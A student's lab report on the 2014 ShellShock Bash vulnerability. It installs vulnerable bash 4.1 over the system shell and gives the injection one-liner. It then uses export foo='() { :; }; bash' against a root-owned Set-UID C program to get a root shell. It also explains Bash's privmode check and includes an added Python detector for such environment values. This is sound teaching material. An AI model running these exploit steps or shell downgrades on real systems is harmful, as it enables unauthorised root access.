2019-2020-12 20199304 "Linux Kernel Principles and Analysis" Week 12 Assignment

ShellShock challenge experiment

I. Experiment introduction

On September 24, 2014, a serious flaw in Bash, ShellShock, was disclosed. The vulnerability affects many systems and can be triggered either remotely or locally.

II. Prior knowledge

1. ShellShock introduction

Shellshock, also known as Bashdoor, is a security vulnerability in the Bash shell, which is widely used on Unix systems; it was first disclosed on September 24, 2014. Many Internet daemons, such as web servers, use Bash to process certain commands, which allows an attacker to execute arbitrary code on a vulnerable version of Bash. This can be exploited to access a computer system without authorization.

2. Setting up the environment

Install Bash version 4.1 with root privileges (from version 4.2 on, the hole has been plugged):

$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz

Once downloaded, build and install it:

$ tar xf bash-4.1.tar.gz
$ cd bash-4.1
$ ./configure
$ make && make install

Link the newly built Bash into place as the system shell:

$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash

After the installation is complete, check whether the ShellShock vulnerability is present:

$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"

Finally, make /bin/sh point to /bin/bash:

$ sudo ln -sf /bin/bash /bin/sh

3. Some prior knowledge about Bash

Bash supports user-defined functions: once a function is defined, it can be called simply by its name.

$ foo() { echo bar; }
$ foo
> bar

Bash represents such a function in the environment as a variable:

KEY = foo
VALUE = () { echo bar; }

Now take a look at the ShellShock vulnerability itself:

export foo='() { :; }; echo Hello World'
bash
>Hello World

Why does invoking bash print Hello World? Look at what the environment holds:

KEY = foo
VALUE = () { :; }; echo Hello World

Bash reads the environment variable, defines the function foo, and then goes on to execute whatever follows the function definition. So as soon as Bash is invoked, the appended statement is triggered.

III. Experiment: attacking a Set-UID program

1. In this experiment we gain root privileges by attacking a Set-UID program. We know that the system() function invokes "/bin/sh -c" to run the specified command, which means /bin/bash is called; can we take advantage of the ShellShock vulnerability to obtain privileges this way? First, make sure you have a vulnerable Bash version, and make /bin/sh point to /bin/bash.

$ sudo ln -sf /bin/bash /bin/sh

2. Create a new file shock.c in the /home/shiyanlou directory and enter the following code:

#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), geteuid() */

int main(void)
{
    setuid(geteuid()); /* make real uid = effective uid */
    system("/bin/ls -l");
    return 0;
}

3. Compile this code and make it a Set-UID program owned by root. (Note that setuid(geteuid()) is used here to make real uid = effective uid; this is not common in Set-UID programs, but it does sometimes happen.)

$ sudo su
$ gcc -o shock shock.c
$ chmod u+s shock

4. The attack procedure:

$ exit
$ export foo='() { :; }; bash'
$ ./shock

5. If the setuid(geteuid()) statement is removed, try the attack again. Can we still obtain privileges?

#include <stdio.h>
#include <stdlib.h>   /* system() */

int main(void)
{
    system("/bin/ls -l");
    return 0;
}

$ sudo su
$ gcc -o sh0ck shock.c
$ chmod u+s sh0ck
$ ls -il sh0ck
$ exit
$ ./sh0ck

It fails! This shows that if the real uid and the effective uid are the same, the content defined in the environment variable takes effect inside the program, so the ShellShock vulnerability can be exploited. But if the two uids differ, the environment variable is ignored and the attack cannot be launched. This can be confirmed in the Bash source code (variables.c, between lines 308 and 369). Point out which line causes this difference and explain why Bash is designed this way. A simplified version of the code is given below:

void initialize_shell_variables ()
{
  /* Loop over every environment variable */
  for (string_index = 0; string = env[string_index++]; )
    {
      /*...*/
      /* If there is an exported function, define it here. */
      /* Functions cannot be imported in privileged mode (under root). */
      if (privmode == 0 && read_but_dont_execute == 0 &&
          STREQN ("() {", string, 4))
        {
          [...]
          /* This is where ShellShock happens: the function definition is
             passed on together with any extra commands that follow it. */
          parse_and_execute (temp_string, name,
                             SEVAL_NONINT|SEVAL_NOHIST);
          [...]
        }
    }
}

It is the condition on that line that causes the difference: privmode stands for privileged mode, and the check requires the real uid and the effective uid to be the same.
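To make the import logic above concrete, here is an added Python example that is not part of the lab or of Bash: it classifies environment values the way the bash 4.1 importer keys on them (the `() {` prefix), separates the function body from any commands appended after its closing brace, and applies the report's reading of the privmode condition. SAMPLE_ENV is a constructed sample; classify, scan, would_import and function_body_end are hypothetical helper names.

```python
# Added example, not from the lab or from bash; helper names are hypothetical.
FUNC_PREFIX = "() {"   # bash 4.1 keys the import on STREQN("() {", string, 4)

# Constructed sample environment; "foo" has the lab's payload shape.
SAMPLE_ENV = {
    "PATH": "/usr/local/bin:/usr/bin",
    "foo": "() { :; }; echo Hello World",
    "bar": "() { echo bar; }",
    "baz": "() { if true; then echo x; fi; }; id",
    "qux": "() { echo nope",
}

def function_body_end(value):
    """Index just past the brace closing the function body, or -1 if the
    braces never balance (quotes are ignored: heuristic, not a bash parser)."""
    depth = 0
    for i, ch in enumerate(value):
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return i + 1
    return -1

def classify(value):
    """Return (kind, trailing): 'plain', 'function', 'malformed', or
    'shellshock' when commands follow the function's closing brace."""
    if not value.startswith(FUNC_PREFIX):
        return "plain", ""
    end = function_body_end(value)
    if end < 0:
        return "malformed", ""
    trailing = value[end:].lstrip(" \t;")  # anything after the body
    return ("shellshock", trailing) if trailing else ("function", "")

def would_import(value, real_uid, effective_uid):
    """The report's reading of variables.c: privmode is 0 only when the real
    and effective uid match, and only then is a function imported."""
    privmode = 0 if real_uid == effective_uid else 1
    return privmode == 0 and value.startswith(FUNC_PREFIX)

def scan(env):
    """Map every entry that is not a plain value to its classification."""
    return {k: classify(v) for k, v in env.items() if classify(v)[0] != "plain"}

if __name__ == "__main__":
    for name, (kind, trailing) in scan(SAMPLE_ENV).items():
        print(name, kind, trailing)
```

Running it on SAMPLE_ENV flags foo and baz as definitions with appended commands, bar as a plain exported function and qux as malformed.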

IV. Difficulties encountered

Problem: compilation produced a system error.
Solution: there was a mistake in the code; after correcting it, the program ran normally.

V. Reflections

This experiment was somewhat shorter than the previous two and simple to carry out, but it is more practically applicable.
Shellshock, also known as Bashdoor, is a security vulnerability in the Bash shell widely used on Unix, first disclosed on September 24, 2014. Many Internet daemons, such as web servers, use Bash to process certain commands, which allows an attacker to execute arbitrary code on a vulnerable version of Bash. This lets an attacker access a computer system without authorization. The ShellShock vulnerability affects many systems and can be triggered both remotely and locally; in this experiment we reproduced the attack by hand to understand it. When the real uid and the effective uid are the same, the ShellShock vulnerability can be exploited, but if the two uids differ the environment variable is ignored and the attack cannot be launched. Some mistakes were made during the experiment, and they were resolved after correction.

Source: www.cnblogs.com/20199304lbs/p/12008037.html